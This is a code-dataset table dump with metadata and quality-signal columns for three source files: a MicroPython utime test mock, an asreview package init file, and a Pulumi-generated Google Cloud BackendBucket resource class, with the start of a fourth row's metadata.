hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
3970a4d32913694232b33a4c9d12bca073bda261
| 165
|
py
|
Python
|
software/tests/mocks/utime.py
|
Allen-Synthesis/EuroPi
|
e4b5fb90ccfd387b7eb9b5e0335e34c7ebfb6194
|
[
"CC0-1.0"
] | 104
|
2021-11-07T10:00:25.000Z
|
2022-03-31T06:40:46.000Z
|
software/tests/mocks/utime.py
|
roryjamesallen/EuroPi-V2
|
e4b5fb90ccfd387b7eb9b5e0335e34c7ebfb6194
|
[
"CC0-1.0"
] | 62
|
2021-11-22T12:56:19.000Z
|
2022-03-31T14:48:43.000Z
|
software/tests/mocks/utime.py
|
roryjamesallen/EuroPi-V2
|
e4b5fb90ccfd387b7eb9b5e0335e34c7ebfb6194
|
[
"CC0-1.0"
] | 27
|
2021-11-22T23:46:49.000Z
|
2022-03-20T04:23:21.000Z
|
def sleep_ms(*args):
pass
def sleep(*args):
pass
def ticks_add(*args):
return 0
def ticks_diff(*args):
return 0
def ticks_ms():
return 0
| 8.684211
| 22
| 0.606061
| 26
| 165
| 3.692308
| 0.384615
| 0.25
| 0.229167
| 0.291667
| 0.395833
| 0
| 0
| 0
| 0
| 0
| 0
| 0.02521
| 0.278788
| 165
| 18
| 23
| 9.166667
| 0.781513
| 0
| 0
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0.2
| 0
| 0.3
| 0.8
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 1
| 0
|
0
| 9
|
39eafe336d66387185286ff8972c4862cb47ef82
| 86
|
py
|
Python
|
asreview/webapp/utils/__init__.py
|
openefsa/asreview
|
aec14fcad0532a3989befe577ceb369a9dbba243
|
[
"Apache-2.0"
] | null | null | null |
asreview/webapp/utils/__init__.py
|
openefsa/asreview
|
aec14fcad0532a3989befe577ceb369a9dbba243
|
[
"Apache-2.0"
] | 1
|
2020-04-16T09:01:40.000Z
|
2020-04-16T09:01:40.000Z
|
asreview/webapp/utils/__init__.py
|
openefsa/asreview
|
aec14fcad0532a3989befe577ceb369a9dbba243
|
[
"Apache-2.0"
] | 1
|
2020-03-04T12:16:53.000Z
|
2020-03-04T12:16:53.000Z
|
from asreview.webapp.utils.paths import *
from asreview.webapp.utils.project import *
| 28.666667
| 43
| 0.813953
| 12
| 86
| 5.833333
| 0.583333
| 0.342857
| 0.514286
| 0.657143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.093023
| 86
| 2
| 44
| 43
| 0.897436
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
844d34a9c635b503c83ebe24a8b772f535d57863
| 28,138
|
py
|
Python
|
sdk/python/pulumi_gcp/compute/backend_bucket.py
|
sisisin/pulumi-gcp
|
af6681d70ea457843409110c1324817fe55f68ad
|
[
"ECL-2.0",
"Apache-2.0"
] | 121
|
2018-06-18T19:16:42.000Z
|
2022-03-31T06:06:48.000Z
|
sdk/python/pulumi_gcp/compute/backend_bucket.py
|
sisisin/pulumi-gcp
|
af6681d70ea457843409110c1324817fe55f68ad
|
[
"ECL-2.0",
"Apache-2.0"
] | 492
|
2018-06-22T19:41:03.000Z
|
2022-03-31T15:33:53.000Z
|
sdk/python/pulumi_gcp/compute/backend_bucket.py
|
sisisin/pulumi-gcp
|
af6681d70ea457843409110c1324817fe55f68ad
|
[
"ECL-2.0",
"Apache-2.0"
] | 43
|
2018-06-19T01:43:13.000Z
|
2022-03-23T22:43:37.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['BackendBucketArgs', 'BackendBucket']
@pulumi.input_type
class BackendBucketArgs:
def __init__(__self__, *,
bucket_name: pulumi.Input[str],
cdn_policy: Optional[pulumi.Input['BackendBucketCdnPolicyArgs']] = None,
custom_response_headers: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
description: Optional[pulumi.Input[str]] = None,
enable_cdn: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
project: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a BackendBucket resource.
:param pulumi.Input[str] bucket_name: Cloud Storage bucket name.
:param pulumi.Input['BackendBucketCdnPolicyArgs'] cdn_policy: Cloud CDN configuration for this Backend Bucket.
Structure is documented below.
:param pulumi.Input[Sequence[pulumi.Input[str]]] custom_response_headers: Headers that the HTTP/S load balancer should add to proxied responses.
:param pulumi.Input[str] description: An optional textual description of the resource; provided by the
client when the resource is created.
:param pulumi.Input[bool] enable_cdn: If true, enable Cloud CDN for this BackendBucket.
:param pulumi.Input[str] name: Name of the resource. Provided by the client when the resource is
created. The name must be 1-63 characters long, and comply with
RFC1035. Specifically, the name must be 1-63 characters long and
match the regular expression `a-z?` which means
the first character must be a lowercase letter, and all following
characters must be a dash, lowercase letter, or digit, except the
last character, which cannot be a dash.
:param pulumi.Input[str] project: The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
"""
pulumi.set(__self__, "bucket_name", bucket_name)
if cdn_policy is not None:
pulumi.set(__self__, "cdn_policy", cdn_policy)
if custom_response_headers is not None:
pulumi.set(__self__, "custom_response_headers", custom_response_headers)
if description is not None:
pulumi.set(__self__, "description", description)
if enable_cdn is not None:
pulumi.set(__self__, "enable_cdn", enable_cdn)
if name is not None:
pulumi.set(__self__, "name", name)
if project is not None:
pulumi.set(__self__, "project", project)
@property
@pulumi.getter(name="bucketName")
def bucket_name(self) -> pulumi.Input[str]:
"""
Cloud Storage bucket name.
"""
return pulumi.get(self, "bucket_name")
@bucket_name.setter
def bucket_name(self, value: pulumi.Input[str]):
pulumi.set(self, "bucket_name", value)
@property
@pulumi.getter(name="cdnPolicy")
def cdn_policy(self) -> Optional[pulumi.Input['BackendBucketCdnPolicyArgs']]:
"""
Cloud CDN configuration for this Backend Bucket.
Structure is documented below.
"""
return pulumi.get(self, "cdn_policy")
@cdn_policy.setter
def cdn_policy(self, value: Optional[pulumi.Input['BackendBucketCdnPolicyArgs']]):
pulumi.set(self, "cdn_policy", value)
@property
@pulumi.getter(name="customResponseHeaders")
def custom_response_headers(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Headers that the HTTP/S load balancer should add to proxied responses.
"""
return pulumi.get(self, "custom_response_headers")
@custom_response_headers.setter
def custom_response_headers(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "custom_response_headers", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
An optional textual description of the resource; provided by the
client when the resource is created.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="enableCdn")
def enable_cdn(self) -> Optional[pulumi.Input[bool]]:
"""
If true, enable Cloud CDN for this BackendBucket.
"""
return pulumi.get(self, "enable_cdn")
@enable_cdn.setter
def enable_cdn(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_cdn", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Name of the resource. Provided by the client when the resource is
created. The name must be 1-63 characters long, and comply with
RFC1035. Specifically, the name must be 1-63 characters long and
match the regular expression `a-z?` which means
the first character must be a lowercase letter, and all following
characters must be a dash, lowercase letter, or digit, except the
last character, which cannot be a dash.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def project(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
"""
return pulumi.get(self, "project")
@project.setter
def project(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "project", value)
@pulumi.input_type
class _BackendBucketState:
def __init__(__self__, *,
bucket_name: Optional[pulumi.Input[str]] = None,
cdn_policy: Optional[pulumi.Input['BackendBucketCdnPolicyArgs']] = None,
creation_timestamp: Optional[pulumi.Input[str]] = None,
custom_response_headers: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
description: Optional[pulumi.Input[str]] = None,
enable_cdn: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
project: Optional[pulumi.Input[str]] = None,
self_link: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering BackendBucket resources.
:param pulumi.Input[str] bucket_name: Cloud Storage bucket name.
:param pulumi.Input['BackendBucketCdnPolicyArgs'] cdn_policy: Cloud CDN configuration for this Backend Bucket.
Structure is documented below.
:param pulumi.Input[str] creation_timestamp: Creation timestamp in RFC3339 text format.
:param pulumi.Input[Sequence[pulumi.Input[str]]] custom_response_headers: Headers that the HTTP/S load balancer should add to proxied responses.
:param pulumi.Input[str] description: An optional textual description of the resource; provided by the
client when the resource is created.
:param pulumi.Input[bool] enable_cdn: If true, enable Cloud CDN for this BackendBucket.
:param pulumi.Input[str] name: Name of the resource. Provided by the client when the resource is
created. The name must be 1-63 characters long, and comply with
RFC1035. Specifically, the name must be 1-63 characters long and
match the regular expression `a-z?` which means
the first character must be a lowercase letter, and all following
characters must be a dash, lowercase letter, or digit, except the
last character, which cannot be a dash.
:param pulumi.Input[str] project: The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
:param pulumi.Input[str] self_link: The URI of the created resource.
"""
if bucket_name is not None:
pulumi.set(__self__, "bucket_name", bucket_name)
if cdn_policy is not None:
pulumi.set(__self__, "cdn_policy", cdn_policy)
if creation_timestamp is not None:
pulumi.set(__self__, "creation_timestamp", creation_timestamp)
if custom_response_headers is not None:
pulumi.set(__self__, "custom_response_headers", custom_response_headers)
if description is not None:
pulumi.set(__self__, "description", description)
if enable_cdn is not None:
pulumi.set(__self__, "enable_cdn", enable_cdn)
if name is not None:
pulumi.set(__self__, "name", name)
if project is not None:
pulumi.set(__self__, "project", project)
if self_link is not None:
pulumi.set(__self__, "self_link", self_link)
@property
@pulumi.getter(name="bucketName")
def bucket_name(self) -> Optional[pulumi.Input[str]]:
"""
Cloud Storage bucket name.
"""
return pulumi.get(self, "bucket_name")
@bucket_name.setter
def bucket_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "bucket_name", value)
@property
@pulumi.getter(name="cdnPolicy")
def cdn_policy(self) -> Optional[pulumi.Input['BackendBucketCdnPolicyArgs']]:
"""
Cloud CDN configuration for this Backend Bucket.
Structure is documented below.
"""
return pulumi.get(self, "cdn_policy")
@cdn_policy.setter
def cdn_policy(self, value: Optional[pulumi.Input['BackendBucketCdnPolicyArgs']]):
pulumi.set(self, "cdn_policy", value)
@property
@pulumi.getter(name="creationTimestamp")
def creation_timestamp(self) -> Optional[pulumi.Input[str]]:
"""
Creation timestamp in RFC3339 text format.
"""
return pulumi.get(self, "creation_timestamp")
@creation_timestamp.setter
def creation_timestamp(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "creation_timestamp", value)
@property
@pulumi.getter(name="customResponseHeaders")
def custom_response_headers(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Headers that the HTTP/S load balancer should add to proxied responses.
"""
return pulumi.get(self, "custom_response_headers")
@custom_response_headers.setter
def custom_response_headers(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "custom_response_headers", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
An optional textual description of the resource; provided by the
client when the resource is created.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="enableCdn")
def enable_cdn(self) -> Optional[pulumi.Input[bool]]:
"""
If true, enable Cloud CDN for this BackendBucket.
"""
return pulumi.get(self, "enable_cdn")
@enable_cdn.setter
def enable_cdn(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_cdn", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Name of the resource. Provided by the client when the resource is
created. The name must be 1-63 characters long, and comply with
RFC1035. Specifically, the name must be 1-63 characters long and
match the regular expression `a-z?` which means
the first character must be a lowercase letter, and all following
characters must be a dash, lowercase letter, or digit, except the
last character, which cannot be a dash.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def project(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
"""
return pulumi.get(self, "project")
@project.setter
def project(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "project", value)
@property
@pulumi.getter(name="selfLink")
def self_link(self) -> Optional[pulumi.Input[str]]:
"""
The URI of the created resource.
"""
return pulumi.get(self, "self_link")
@self_link.setter
def self_link(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "self_link", value)
class BackendBucket(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
bucket_name: Optional[pulumi.Input[str]] = None,
cdn_policy: Optional[pulumi.Input[pulumi.InputType['BackendBucketCdnPolicyArgs']]] = None,
custom_response_headers: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
description: Optional[pulumi.Input[str]] = None,
enable_cdn: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
project: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Backend buckets allow you to use Google Cloud Storage buckets with HTTP(S)
load balancing.
An HTTP(S) load balancer can direct traffic to specified URLs to a
backend bucket rather than a backend service. It can send requests for
static content to a Cloud Storage bucket and requests for dynamic content
to a virtual machine instance.
To get more information about BackendBucket, see:
* [API documentation](https://cloud.google.com/compute/docs/reference/v1/backendBuckets)
* How-to Guides
* [Using a Cloud Storage bucket as a load balancer backend](https://cloud.google.com/compute/docs/load-balancing/http/backend-bucket)
## Example Usage
### Backend Bucket Basic
```python
import pulumi
import pulumi_gcp as gcp
image_bucket = gcp.storage.Bucket("imageBucket", location="EU")
image_backend = gcp.compute.BackendBucket("imageBackend",
description="Contains beautiful images",
bucket_name=image_bucket.name,
enable_cdn=True)
```
## Import
BackendBucket can be imported using any of these accepted formats
```sh
$ pulumi import gcp:compute/backendBucket:BackendBucket default projects/{{project}}/global/backendBuckets/{{name}}
```
```sh
$ pulumi import gcp:compute/backendBucket:BackendBucket default {{project}}/{{name}}
```
```sh
$ pulumi import gcp:compute/backendBucket:BackendBucket default {{name}}
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] bucket_name: Cloud Storage bucket name.
:param pulumi.Input[pulumi.InputType['BackendBucketCdnPolicyArgs']] cdn_policy: Cloud CDN configuration for this Backend Bucket.
Structure is documented below.
:param pulumi.Input[Sequence[pulumi.Input[str]]] custom_response_headers: Headers that the HTTP/S load balancer should add to proxied responses.
:param pulumi.Input[str] description: An optional textual description of the resource; provided by the
client when the resource is created.
:param pulumi.Input[bool] enable_cdn: If true, enable Cloud CDN for this BackendBucket.
:param pulumi.Input[str] name: Name of the resource. Provided by the client when the resource is
created. The name must be 1-63 characters long, and comply with
RFC1035. Specifically, the name must be 1-63 characters long and
match the regular expression `a-z?` which means
the first character must be a lowercase letter, and all following
characters must be a dash, lowercase letter, or digit, except the
last character, which cannot be a dash.
:param pulumi.Input[str] project: The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: BackendBucketArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Backend buckets allow you to use Google Cloud Storage buckets with HTTP(S)
load balancing.
An HTTP(S) load balancer can direct traffic to specified URLs to a
backend bucket rather than a backend service. It can send requests for
static content to a Cloud Storage bucket and requests for dynamic content
to a virtual machine instance.
To get more information about BackendBucket, see:
* [API documentation](https://cloud.google.com/compute/docs/reference/v1/backendBuckets)
* How-to Guides
* [Using a Cloud Storage bucket as a load balancer backend](https://cloud.google.com/compute/docs/load-balancing/http/backend-bucket)
## Example Usage
### Backend Bucket Basic
```python
import pulumi
import pulumi_gcp as gcp
image_bucket = gcp.storage.Bucket("imageBucket", location="EU")
image_backend = gcp.compute.BackendBucket("imageBackend",
description="Contains beautiful images",
bucket_name=image_bucket.name,
enable_cdn=True)
```
## Import
BackendBucket can be imported using any of these accepted formats
```sh
$ pulumi import gcp:compute/backendBucket:BackendBucket default projects/{{project}}/global/backendBuckets/{{name}}
```
```sh
$ pulumi import gcp:compute/backendBucket:BackendBucket default {{project}}/{{name}}
```
```sh
$ pulumi import gcp:compute/backendBucket:BackendBucket default {{name}}
```
:param str resource_name: The name of the resource.
:param BackendBucketArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(BackendBucketArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
bucket_name: Optional[pulumi.Input[str]] = None,
cdn_policy: Optional[pulumi.Input[pulumi.InputType['BackendBucketCdnPolicyArgs']]] = None,
custom_response_headers: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
description: Optional[pulumi.Input[str]] = None,
enable_cdn: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
project: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = BackendBucketArgs.__new__(BackendBucketArgs)
if bucket_name is None and not opts.urn:
raise TypeError("Missing required property 'bucket_name'")
__props__.__dict__["bucket_name"] = bucket_name
__props__.__dict__["cdn_policy"] = cdn_policy
__props__.__dict__["custom_response_headers"] = custom_response_headers
__props__.__dict__["description"] = description
__props__.__dict__["enable_cdn"] = enable_cdn
__props__.__dict__["name"] = name
__props__.__dict__["project"] = project
__props__.__dict__["creation_timestamp"] = None
__props__.__dict__["self_link"] = None
super(BackendBucket, __self__).__init__(
'gcp:compute/backendBucket:BackendBucket',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
bucket_name: Optional[pulumi.Input[str]] = None,
cdn_policy: Optional[pulumi.Input[pulumi.InputType['BackendBucketCdnPolicyArgs']]] = None,
creation_timestamp: Optional[pulumi.Input[str]] = None,
custom_response_headers: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
description: Optional[pulumi.Input[str]] = None,
enable_cdn: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
project: Optional[pulumi.Input[str]] = None,
self_link: Optional[pulumi.Input[str]] = None) -> 'BackendBucket':
"""
Get an existing BackendBucket resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] bucket_name: Cloud Storage bucket name.
:param pulumi.Input[pulumi.InputType['BackendBucketCdnPolicyArgs']] cdn_policy: Cloud CDN configuration for this Backend Bucket.
Structure is documented below.
:param pulumi.Input[str] creation_timestamp: Creation timestamp in RFC3339 text format.
:param pulumi.Input[Sequence[pulumi.Input[str]]] custom_response_headers: Headers that the HTTP/S load balancer should add to proxied responses.
:param pulumi.Input[str] description: An optional textual description of the resource; provided by the
client when the resource is created.
:param pulumi.Input[bool] enable_cdn: If true, enable Cloud CDN for this BackendBucket.
:param pulumi.Input[str] name: Name of the resource. Provided by the client when the resource is
created. The name must be 1-63 characters long, and comply with
RFC1035. Specifically, the name must be 1-63 characters long and
match the regular expression `a-z?` which means
the first character must be a lowercase letter, and all following
characters must be a dash, lowercase letter, or digit, except the
last character, which cannot be a dash.
:param pulumi.Input[str] project: The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
:param pulumi.Input[str] self_link: The URI of the created resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _BackendBucketState.__new__(_BackendBucketState)
__props__.__dict__["bucket_name"] = bucket_name
__props__.__dict__["cdn_policy"] = cdn_policy
__props__.__dict__["creation_timestamp"] = creation_timestamp
__props__.__dict__["custom_response_headers"] = custom_response_headers
__props__.__dict__["description"] = description
__props__.__dict__["enable_cdn"] = enable_cdn
__props__.__dict__["name"] = name
__props__.__dict__["project"] = project
__props__.__dict__["self_link"] = self_link
return BackendBucket(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="bucketName")
def bucket_name(self) -> pulumi.Output[str]:
"""
Cloud Storage bucket name.
"""
return pulumi.get(self, "bucket_name")
@property
@pulumi.getter(name="cdnPolicy")
def cdn_policy(self) -> pulumi.Output['outputs.BackendBucketCdnPolicy']:
"""
Cloud CDN configuration for this Backend Bucket.
Structure is documented below.
"""
return pulumi.get(self, "cdn_policy")
@property
@pulumi.getter(name="creationTimestamp")
def creation_timestamp(self) -> pulumi.Output[str]:
"""
Creation timestamp in RFC3339 text format.
"""
return pulumi.get(self, "creation_timestamp")
@property
@pulumi.getter(name="customResponseHeaders")
def custom_response_headers(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
Headers that the HTTP/S load balancer should add to proxied responses.
"""
return pulumi.get(self, "custom_response_headers")
@property
@pulumi.getter
def description(self) -> pulumi.Output[Optional[str]]:
"""
An optional textual description of the resource; provided by the
client when the resource is created.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter(name="enableCdn")
def enable_cdn(self) -> pulumi.Output[Optional[bool]]:
"""
If true, enable Cloud CDN for this BackendBucket.
"""
return pulumi.get(self, "enable_cdn")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Name of the resource. Provided by the client when the resource is
created. The name must be 1-63 characters long, and comply with
RFC1035. Specifically, the name must be 1-63 characters long and
match the regular expression `a-z?` which means
the first character must be a lowercase letter, and all following
characters must be a dash, lowercase letter, or digit, except the
last character, which cannot be a dash.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def project(self) -> pulumi.Output[str]:
"""
The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
"""
return pulumi.get(self, "project")
@property
@pulumi.getter(name="selfLink")
def self_link(self) -> pulumi.Output[str]:
    """
    The URI of the created resource.
    """
    uri = pulumi.get(self, "self_link")
    return uri
| 44.242138
| 152
| 0.648944
| 3,324
| 28,138
| 5.326113
| 0.076414
| 0.074559
| 0.062472
| 0.050949
| 0.887088
| 0.868335
| 0.858507
| 0.851728
| 0.848848
| 0.824164
| 0
| 0.004265
| 0.258441
| 28,138
| 635
| 153
| 44.311811
| 0.844196
| 0.413569
| 0
| 0.740741
| 1
| 0
| 0.109469
| 0.039575
| 0
| 0
| 0
| 0
| 0
| 1
| 0.161616
| false
| 0.003367
| 0.023569
| 0
| 0.282828
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
8455373fa244c05e161806267cbc1d6a574f01c6
| 23,530
|
py
|
Python
|
tools/paper_test.py
|
huaer9258/SRDN
|
e5cfec029942088523550cc62f47e6f6519a6474
|
[
"MIT"
] | 3
